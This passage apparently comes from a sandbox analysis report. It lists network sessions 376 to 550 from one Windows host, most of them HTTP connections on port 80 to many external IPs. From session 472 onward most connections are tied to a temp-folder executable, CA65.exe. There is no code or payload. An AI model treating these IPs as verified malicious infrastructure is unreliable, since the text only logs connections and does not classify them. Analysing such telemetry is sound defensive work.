376	192.168.2.4	63532	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
377	192.168.2.4	63534	192.252.151.25	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
378	192.168.2.4	63529	185.162.89.66	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
379	192.168.2.4	63577	3.94.41.167	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
380	192.168.2.4	63595	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
381	192.168.2.4	63642	34.205.242.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
382	192.168.2.4	63711	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
383	192.168.2.4	63787	141.193.213.10	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
384	192.168.2.4	63798	104.26.0.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
385	192.168.2.4	63737	208.91.197.26	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
386	192.168.2.4	63717	107.158.136.76	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
387	192.168.2.4	63745	185.230.63.171	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
388	192.168.2.4	63790	34.206.39.153	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
389	192.168.2.4	63724	38.181.56.100	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
390	192.168.2.4	63730	209.182.195.165	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
391	192.168.2.4	63807	34.206.39.153	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
392	192.168.2.4	63731	66.254.66.55	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
393	192.168.2.4	63843	172.98.192.36	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
394	192.168.2.4	63828	54.161.222.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
395	192.168.2.4	63833	52.165.155.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
396	192.168.2.4	63912	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
397	192.168.2.4	63687	89.46.108.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
398	192.168.2.4	63909	208.91.197.26	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
399	192.168.2.4	63744	62.149.128.163	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
400	192.168.2.4	63914	34.136.28.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
401	192.168.2.4	63789	167.235.0.29	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
402	192.168.2.4	63834	62.149.128.163	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
403	192.168.2.4	64085	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
404	192.168.2.4	64106	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
405	192.168.2.4	64115	3.94.41.167	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
406	192.168.2.4	64107	89.46.108.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
407	192.168.2.4	63786	156.38.230.76	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
408	192.168.2.4	64155	173.201.182.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
409	192.168.2.4	64192	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
410	192.168.2.4	64270	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
411	192.168.2.4	64269	104.17.71.73	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
412	192.168.2.4	64227	52.165.155.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
413	192.168.2.4	64273	23.229.226.96	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
414	192.168.2.4	64352	205.178.132.70	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
415	192.168.2.4	64388	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
416	192.168.2.4	64386	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
417	192.168.2.4	64230	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
418	192.168.2.4	64222	68.178.145.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
419	192.168.2.4	64332	217.146.69.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
420	192.168.2.4	64342	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
421	192.168.2.4	61805	116.90.51.60	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
422	192.168.2.4	64629	64.68.191.221	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
423	192.168.2.4	64700	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
424	192.168.2.4	64699	192.178.50.46	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
425	192.168.2.4	64758	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
426	192.168.2.4	64799	141.193.213.10	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
427	192.168.2.4	64797	104.17.71.73	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
428	192.168.2.4	64764	35.168.67.138	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
429	192.168.2.4	64803	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
430	192.168.2.4	64765	192.252.151.25	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
431	192.168.2.4	64783	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
432	192.168.2.4	64802	34.206.39.153	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
433	192.168.2.4	64856	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
434	192.168.2.4	64893	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
435	192.168.2.4	64892	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
436	192.168.2.4	64858	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
437	192.168.2.4	64894	104.24.82.4	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
438	192.168.2.4	64909	69.42.204.12	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
439	192.168.2.4	64824	89.46.108.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
440	192.168.2.4	64832	62.149.128.40	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
441	192.168.2.4	64854	62.149.128.40	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
442	192.168.2.4	64945	208.91.197.26	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
443	192.168.2.4	64931	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
444	192.168.2.4	65024	205.178.132.70	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
445	192.168.2.4	65015	185.230.63.171	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
446	192.168.2.4	64961	216.194.166.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
447	192.168.2.4	64908	89.46.108.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
448	192.168.2.4	65053	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
449	192.168.2.4	64815	68.178.145.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
450	192.168.2.4	65097	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
451	192.168.2.4	65081	34.136.28.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
452	192.168.2.4	65145	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
453	192.168.2.4	65407	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
454	192.168.2.4	65415	54.161.222.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
455	192.168.2.4	65418	34.205.242.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
456	192.168.2.4	65374	23.229.226.96	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
457	192.168.2.4	65519	35.168.67.138	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
458	192.168.2.4	65297	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
459	192.168.2.4	49152	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
460	192.168.2.4	65357	35.197.165.27	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
461	192.168.2.4	65366	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
462	192.168.2.4	49330	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
463	192.168.2.4	49449	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
464	192.168.2.4	49430	205.178.132.70	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
465	192.168.2.4	49303	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
466	192.168.2.4	49302	69.42.204.12	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
467	192.168.2.4	49424	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
468	192.168.2.4	49474	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
469	192.168.2.4	49475	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
470	192.168.2.4	49473	68.178.145.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
471	192.168.2.4	49563	104.21.52.80	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
472	192.168.2.4	49982	89.46.108.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
473	192.168.2.4	50121	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
474	192.168.2.4	50138	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
475	192.168.2.4	50117	3.94.41.167	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
476	192.168.2.4	50143	104.26.0.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
477	192.168.2.4	50145	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
478	192.168.2.4	50149	3.94.41.167	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
479	192.168.2.4	50148	34.205.242.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
480	192.168.2.4	50153	54.161.222.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
481	192.168.2.4	50158	104.143.9.211	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
482	192.168.2.4	50152	34.136.28.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
483	192.168.2.4	50142	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
484	192.168.2.4	50155	185.230.63.171	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
485	192.168.2.4	50154	62.149.128.163	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
486	192.168.2.4	50151	62.149.128.163	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
487	192.168.2.4	50205	192.178.50.46	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
488	192.168.2.4	50281	104.21.52.80	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
489	192.168.2.4	50290	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
490	192.168.2.4	50282	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
491	192.168.2.4	50279	52.165.155.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
492	192.168.2.4	50296	52.165.155.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
493	192.168.2.4	50347	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
494	192.168.2.4	50297	23.229.226.96	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
495	192.168.2.4	50410	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
496	192.168.2.4	50415	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
497	192.168.2.4	50460	141.193.213.10	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
498	192.168.2.4	50461	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
499	192.168.2.4	50390	50.31.65.5	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
500	192.168.2.4	50398	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
501	192.168.2.4	50414	185.230.63.171	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
502	192.168.2.4	50295	167.235.0.29	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
503	192.168.2.4	50444	209.124.80.122	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
504	192.168.2.4	50456	216.194.166.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
505	192.168.2.4	50417	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
506	192.168.2.4	50447	91.132.253.137	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
507	192.168.2.4	50412	167.235.0.29	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
508	192.168.2.4	50454	3.126.94.219	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
509	192.168.2.4	50286	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
510	192.168.2.4	50395	217.146.69.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
511	192.168.2.4	50288	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
512	192.168.2.4	50457	116.90.51.60	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
513	192.168.2.4	51051	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
514	192.168.2.4	51080	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
515	192.168.2.4	51523	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
516	192.168.2.4	51502	62.149.128.40	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
517	192.168.2.4	51521	62.149.128.40	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
518	192.168.2.4	51568	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
519	192.168.2.4	51844	54.161.222.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
520	192.168.2.4	51836	34.205.242.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
521	192.168.2.4	52030	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
522	192.168.2.4	52414	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
523	192.168.2.4	52617	3.94.41.167	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
524	192.168.2.4	52566	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
525	192.168.2.4	52460	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
526	192.168.2.4	52412	69.42.204.12	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
527	192.168.2.4	52418	13.248.169.48	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
528	192.168.2.4	52372	89.46.108.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
529	192.168.2.4	52278	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
530	192.168.2.4	52363	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
531	192.168.2.4	53010	64.68.191.221	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
532	192.168.2.4	52994	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
533	192.168.2.4	53014	104.17.71.73	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
534	192.168.2.4	53040	35.168.67.138	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
535	192.168.2.4	53048	216.194.166.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
536	192.168.2.4	53044	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
537	192.168.2.4	53052	34.205.242.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
538	192.168.2.4	53056	54.161.222.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
539	192.168.2.4	53050	3.94.41.167	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
540	192.168.2.4	53058	34.136.28.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
541	192.168.2.4	53060	185.230.63.171	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
542	192.168.2.4	53299	104.17.71.73	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
543	192.168.2.4	53038	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
544	192.168.2.4	53578	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
545	192.168.2.4	53582	62.149.128.163	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
546	192.168.2.4	53722	141.193.213.10	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
547	192.168.2.4	53726	52.165.155.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
548	192.168.2.4	54109	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
549	192.168.2.4	53971	89.46.108.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
550	192.168.2.4	54115	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

